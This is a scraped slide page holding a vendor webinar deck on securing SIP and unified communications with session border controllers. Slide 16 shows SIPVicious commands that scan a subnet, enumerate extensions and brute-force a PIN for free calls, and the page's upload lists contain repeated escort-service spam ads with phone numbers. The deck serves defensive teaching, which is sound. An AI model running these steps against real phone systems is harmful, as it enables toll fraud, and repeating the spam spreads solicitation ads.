04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 

KĂźrzlich hochgeladen (20)

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 

Securing UC Borders with Acme Packet

  • 1. February, 2012 Securing your Unified Communications Borders with Acme Packet - in association with The SIP School Patrick McNeil, CISSP Acme Packet Premium Services Graham Francis CEO The SIP School
  • 2. The SIP School • Founded in April 2000 • 5500+ Students • Provide the Industry recognised SSCA® SIP Certification program, endorsed by the TIA + more. • eLearning in modular format • Unique as content evolves as SIP evolves • Connected with Acme Packet to provide SIP foundation training • http://www.thesipschool.com / Discount codes later. • Now let’s start by looking at the challenges in securing unified communications. 2
  • 3. The Unified Communications security challenge Adopt enterprise-wide IP communications to improve collaboration and productivity... …. All without increasing your risk profile 3
  • 4. Unified Communications services are a prominent target October 2010 - SIPVicious port 5060 scans lead to €11 million loss March 2011 – Romania - Former employee held - Forged VoIP pins created May 2011 - Hudson County, New Jersey Man Pleads Guilty to $4.4 Million VoIP Fraud Scheme November 2011 - Philippine phone phreakers arrested after defrauding AT&T out of $2 Million to fund terrorists 4
  • 5. UC services are an easy target • IP networks are inherently insecure – Developed without security in mind • Organizations rely on IP networks to conduct business – Multimodal communications difficult to control • Confidential information freely exchanged by users that don’t understand how it is transmitted 5
  • 6. Cybercrime is organized • Knowledge, tools and techniques are shared openly • May have goals motivated by politics or profit • Commoditized sale of both the tools and results of the trade – Computing time on a botnet – “Fake” calling cards – Long distance calling with disposable phones – Number hijacking – Toll / international bypass 6
  • 7. What are the threats?
  • 8. How are UC services established? Items in red might reveal sensitive information
      SIP signaling:
        INVITE sip:15559191212@serviceprovider.com SIP/2.0
        Via: SIP/2.0/UDP 10.1.3.3:5060;branch=z9hG4bKb27061747269636b
        From: "JConnor" <sip:15554141337@10.1.3.3:5060>;tag=18de4db33f
        To: "15559191212" <sip:15559191212@serviceprovider.com>
        Call-ID: 19424e0d9187654209ed34db33f
        CSeq: 1 INVITE
        Max-Forwards: 70
        User-Agent: BigTelcoVendor/R16.4.1.1
        Supported: 100rel,timer,replaces,join,histinfo
        Allow: INVITE,CANCEL,BYE,ACK,NOTIFY,REFER,OPTIONS,INFO,PUBLISH
        Contact: "JConnor" <sip:15554141337@10.1.3.3:5060;transport=udp>
        Content-Type: application/sdp
        Content-Length: 165
      SDP media description:
        v=0
        o=- 1 1 IN IP4 10.1.3.3
        s=-
        c=IN IP4 10.1.3.3
        b=AS:64
        t=0 0
        m=audio 19001 RTP/AVP 0 127
        a=rtpmap:0 PCMU/8000
        a=rtpmap:127 telephone-event/8000
  • 9. How are your services targeted? The OSI Model Layers:
      Application: Voice or video devices, chat, session recording, web integrated real-time communications applications
      Presentation: CODECs (DSP)
      Session: SIP, H323, MGCP, H248, TLS (signaling); RTP, RTCP (media)
      Transport: TCP, UDP, SCTP
      Network: IPv4, IPv6, NAT, IPsec
      Data Link: Data link technology that supports the transport of IP
      Physical: Physical technology that supports the transport of data link frames
      [Diagram label: Session Delivery Targets]
      Exploits focused at the middle layers of the OSI model tend to get around traditional security implementations since the whole point is to allow services
  • 10. The penetration campaign
      Phases: Reconnaissance, Enumeration, Attack, Gaining access, Maintaining access, Covering tracks
      Reconnaissance: Information gathering
      Enumeration: Port scanning, OS fingerprinting, Service detection
      Attack: Attack, gain and maintain access, and cover tracks
      • Initial phases of an organized attack can easily go undetected
      • Stopping or making the early phases of an attack difficult can avoid service outage or fraud
  • 11. What are the threats? (Threat: Potential Result)
      Reconnaissance scan: Preparation for targeted denial of service, fraud, or theft of service
      Session overloads: Denial of service
      Protocol fuzzing: Denial of service
      SPAM over Internet Telephony (SPIT): Targeted denial of service, fraud, breach of privacy
      Call Interception or Session Hijacking: Targeted denial of service, breach of privacy, fraud, theft
      Eavesdropping: Breach of privacy, fraud, theft
      Media injection: Denial of service, fraud, theft
  • 12. Which threats are seen the most? Overload: Resource consumption, Availability disruption, DoS/DDoS, Unintentional Overload [Diagram: attackers (A), Internet, SIP Provider OR Internal Network, Internal]
  • 13. Which threats are seen the most? Theft of services / fraud: Large phone bills, Investigation costs [Diagram: attackers (A), Internet, SIP Provider OR Internal Network, Internal, Premium Rate Center]
  • 14. Which threats are seen the most? SPAM / SPIT: Nuisance, Social Engineering [Diagram: attackers (A), Internet, SIP Provider OR Internal Network, Internal, Internal Threat]
  • 15. Not as much… “Man in the middle”: Session-hijacking, Media injection, Remote Control, Eavesdropping [Diagram: attacker (A), Internet, SIP Provider OR Internal Network, Internal, Internal Threat]
  • 16. A simple example using SIPVicious
      I just went to your website and got the phone numbers for HR, Support, Investor Relations, etc., and they all seem to end with 1xxx…
      Scan the IP range registered to your company as reported by ARIN
        root@bt:/pentest/voip/sipvicious# ./svmap.py -p5060-5061 192.168.133.0/24
        | SIP Device           | User Agent   | Fingerprint                            |
        --------------------------------------------------------------------------------
        | 192.168.133.128:5060 | Asterisk PBX | Asterisk / SJphone/1.60.289a (SJ Labs) |
      Enumerate extensions …
        root@bt:/pentest/voip/sipvicious# ./svwar.py -e1000-9999 192.168.133.128
        ------------------------------
        | 1005 | reqauth |
        | 1004 | reqauth |
        | 1003 | reqauth |
        | 1002 | noauth  |
        | 1001 | reqauth |
      We got one extension without a password! It must be misconfigured.
      Look for numeric passwords for another extension …
        root@bt:/pentest/voip/sipvicious# ./svcrack.py -u1001 -r1000-999999 192.168.133.128
        | Extension | Password |
        ------------------------
        | 1001      | 1234     |
      Now just register a couple of soft phones and make free calls!
  • 17. BUT, wasn’t analog TDM safer? NO! We still saw: • Eavesdropping • Media injection • Caller impersonation • Toll fraud • Physical attacks 17
  • 18. How does Acme Packet secure Unified Communications services?
  • 19. Net-Net E-SBCs control and secure network borders
      Strong security: • Network border protection • Privacy
      Easy interoperability: • SIP interoperability • Protocol interworking
      Assured reliability: • Quality user experience • Resilient services
      [Diagram: Service Provider; Enterprise with IP telephony, Conferencing, CRM, Tele-presence, Contact center]
  • 20. Net-SAFE™ Session-Aware Filtering & Enforcement • Hardware & Software DoS/DDoS prevention • Hardware-accelerated encryption & authentication • Dynamic and Static Access control lists • Protocol enforcement and interoperability • Topology hiding and NAT • Session overload protection (upstream/downstream) • Regulatory compliance / legal intercept to recorder • Fraud prevention / endpoint trust management • Routing, high availability and load balancing HW DoS policy SW DoS Routing / Session Management Destination + ACLs policy Availability Endpoint Trust Threshold Management Management Discard 20
  • 21. Confidentiality: Ensure that information is not disclosed to unauthorized parties [Diagram: security as confidentiality, integrity, availability]
  • 22. Remove identifying data
      Obscure the internal structure of your network and services so attackers don’t know what or how to attack
      Before: From: JConnor @ my desk / To: Customer / Via: My PBX / Route: PBX, SBC / Phone: Brand X Desk Phone, software version x.y.z.1 / Send Audio: To my phone / Vendor Specific: Location
      After: From: CorpUser @ SBC / To: Customer / Via: SBC / Route: SBC / Send Audio: To SBC
      • Back to Back User Agent (B2BUA) - terminates and re-originates all sessions so we can manipulate them
      • Topology Hiding – modify or strip signaling message parts that might reveal your internal network or telephony topology
  • 23. Authorize and encrypt for privacy and control
      Signaling or media traffic going across an untrusted network should be encrypted to avoid eavesdropping or hijacking, and assure message integrity
      • Fast hardware-accelerated encryption
      • Encryption specified on boundary by boundary basis
      • Can ensure non-repudiation
      [Diagram: Enterprise, Private network, Campus, Branch, Internet, attacker (A) sniffing; legend: Legitimate session, TLS-encrypted session]
  • 24. Integrity: Data and systems are not modified or used maliciously or accidentally [Diagram: security as confidentiality, integrity, availability]
  • 25. Assure message integrity
      Verify the integrity of signaling and media that enters your network to prevent service disruption
      • Attacks are dropped at the network processor and won’t impact the CPU or memory
      • Signaling is decomposed and analyzed for validity against RFC requirements
      [Diagram of the E-SBC: UAS/UAC, Session Control Function, Routing, Protocol Manipulation, Policing Engine, Parser, Host Based Software, Traffic Manager, Classifier, Media Control Function, Encryption, Network Processor, Network Interface, Embedded Software, Signaling, Media]
  • 26. Prevent fraudulent calls
      Monitor violations of call thresholds to spot misbehaving hosts, and analyze call detail records to detect fraud patterns
      • Routing rules can refuse traffic to premium or fraudulent rate centers
      • SNMP traps to management station indicate potential abuse
      • Call Detail Record (CDR) feeds can be sent “off box” for analysis including metrics for call quality
      [Diagram: attacker, management station]
  • 27. Availability: Reliability and accessibility of data and resources to authorized individuals in a timely manner [Diagram: security as confidentiality, integrity, availability]
  • 28. Denial of Service (DoS) protection
      Assume hosts are untrusted until they verify their identity through authentication and/or other actions. Establish thresholds to protect against compromised or unintentionally misbehaving hosts
      • Initial trust level and message thresholds enforced
      • Depending on their actions, hosts will be promoted to trusted status or demoted to untrusted or denied status
      • Queues based on trust level make sure services are available even while under DoS attack
      [Diagram: Dynamic Trust Levels: Trusted, Untrusted, Deny]
  • 29. Manage service capacities
      Understand the capacities of your services and limit access so they do not become overwhelmed
      • Thresholds per session agent – Sessions – Burst rate – Sustained rate – Status
      • Variable load balancing
      [Diagram: three session agents]
        50%: Sessions = 500, Burst-rate = 10 cps, Sustained = 8 cps
        30%: Sessions = 300, Burst-rate = 5 cps, Sustained = 4 cps
        20%: Sessions = 200, Burst-rate = 4 cps, Sustained = 3 cps
  • 30. Make UC services resilient
      Implement hardware and/or site redundancy to minimize the impact of physical attacks to building, power, network, etc.
      High Availability: • No loss of active sessions • Active / Standby failover in 40ms • Checkpointing configuration, media & signaling state • Preserves CDRs on failover
      Multi-site failover: • Multiple SIP trunks improve network resiliency in disaster recovery scenarios • SBC enables fast failover without operator intervention
      [Diagram label: X sessions]
  • 32. Trust zones provide flexibility
      Use the SBC to create a virtual firewall DMZ architecture to create multiple zones with different trust levels
      [Diagram: the SBC performs routing and interworking of signaling and media between Internet, Core / Backbone, Partner, Outsourcer and Internal zones, each SIP or H.323, labelled Low Trust, Medium Trust or High Trust]
  • 33. Security for SIP trunking applications
      Run data firewalls and Acme Packet SBCs in parallel to manage data and communications services in the optimal location
      [Diagram: SIP / MPLS Provider, Internet, or any Untrusted Network; DMZ; Acme Packet SBC HA Pair; Data Network or VLAN; UC Network or VLAN]
  • 34. Security for remote worker access
      Send remote users to the SBC instead of your VPN concentrator for message verification, throttling, and best performance without the need for a VPN client
      TLS/SRTP to SBC vs VPN Tunnel
      • SIP message integrity verification
      • SBC can cache client registration, responding to regular client keep-alives
      • Confidentiality through signaling and media encryption
      • Easier connectivity & traversal through local firewalls vs. VPN solutions - especially while travelling
      [Diagram: Data centers, VPN, Internet, Teleworker, Teleworker]
  • 36. “Why do I need a SBC when the service provider has one?”
    • Integrity: The Service Provider SBC is there to protect themselves from you
    • Availability: Routing to SIP gateways and service providers
    • Interop / Confidentiality: SIP normalization and topology hiding
    • Quality of Service: Call routing can be dynamically driven by call quality
    [Diagram labels: Service Provider; Customer 1,2,3 ….]
  • 37. “What do I tell my security department?”
    • 1,525 customers in 107 countries – the industry standard
    • Processes calls through both general IP and UC specific attacks
    • Acme Packet Net-Net SBC certified by the U.S. DISA JITC at Ft. Huachuca, AZ for information assurance and interoperability in DoD networks
    • Can work in a firewall DMZ if best practices are followed
  • 39. Don’t forget to think holistically…
    • Physical security – locks, badges, lighting, emergency exits
    • Data security – 802.1x, LLDP, firewalls, ACLs, VLAN strategy, internal encryption, administrative interfaces, QoS marking and measurement
    • Host security – Anti-virus, control of third party apps and endpoints, patching and configuration of end devices, asset acquisition and disposal
    • Disaster recovery – redundant hardware, services, network
    • Compensating controls – CDR analysis to prevent or detect insider abuse, logging, video surveillance; internal scans or penetration testing
    • Internal controls – hiring policies and security reviews
    • Employee training programs – best practices guidelines and clear expectations; educate employees to recognize social engineering
  • 40. Additional resources
    • Acme Packet services, training, sales, or partners: http://www.acmepacket.com/
    • The SIP School: http://www.thesipschool.com/
    • Back | Track Linux VoIP wiki pages: http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP
    • Voice Over IP Security Alliance (VOIPSA): http://voipsa.org
    • The SIP Forum: http://www.sipforum.org/
    • Your service provider
  • 42. Thank you
    • sales@acmepacket.com
    • info@thesipschool.com
    • The SIP School Discount Code = APDC2204
    • Link to webinar recording will be e-mailed to all registered participants